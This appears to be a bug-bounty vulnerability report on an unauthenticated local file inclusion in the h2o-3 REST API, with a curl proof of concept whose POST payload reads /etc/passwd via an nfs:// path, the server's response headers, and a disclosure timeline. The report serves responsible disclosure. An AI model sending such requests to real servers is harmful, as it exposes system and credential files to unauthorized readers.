LFI in h2o-3 API in h2oai/h2o-3


Reported on

Jun 8th 2023


Local file include in h2o-3 REST API. Unauthenticated, remote, no user interaction, default installation.

Proof of Concept

Start the h2o-3 API with:

cd h2o-
java -jar h2o.jar

Then make these curl requests:

curl -i -s -k -X $'GET' \
    -H $'Host:' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' -H $'Referer:' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' \
curl -i -s -k -X $'POST' \
    -H $'Host:' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 50' -H $'Origin:' -H $'Connection: close' -H $'Referer:' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' \
    --data-binary $'source_frames=%5B%22nfs%3A%2F%2Fetc%2Fpasswd%22%5D' \

The response:

HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jun 2023 15:10:27 GMT
Cache-Control: no-cache
X-h2o-rest-api-version-max: 3
X-h2o-cluster-id: 1686167537026
X-h2o-cluster-good: true
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' 'unsafe-eval' 'unsafe-inline'; img-src 'self' data:
Content-Type: application/json
Content-Length: 1457


Developers have been contacted 06/08/2023:

H2O Support
Wed, Jun 7, 4:32 PM (18 hours ago)
to me

Dear Dan McInerney,

We would like to acknowledge that we have received your request for support and a ticket has been created. A support representative will be reviewing your request and will send you a personal response.
Your ticket id is :  [#105551] 

To view the status of the ticket or add comments, please visit

Your problem description is as below:

The h2o-3 API has an LFI. You can read any file on the filesystem with import and parse commands. By default the API initializes without authentication and is remotely accessible to anyone on the local network, or the world at large if the user publicly exposed the endpoint.

Ticket attachments : 1. lfi id rsa.png
2. Screenshot 2023-06-07 at 4.31.34 PM.png

Thank you for your patience.

H2O.ai Support Team


Remotely accessing every file on the API server with the permissions of the user who ran the command.


Not sure this is exactly where it is

We are processing your report and will contact the h2oai/h2o-3 team within 24 hours. 6 months ago
We have contacted a member of the h2oai/h2o-3 team and are waiting to hear back 6 months ago
Dan McInerney modified the Severity from Critical (9.9) to High (8.6) 2 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Marcello validated this vulnerability a month ago
Dan McInerney has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Ben Harvie published this vulnerability 20 days ago
to join this conversation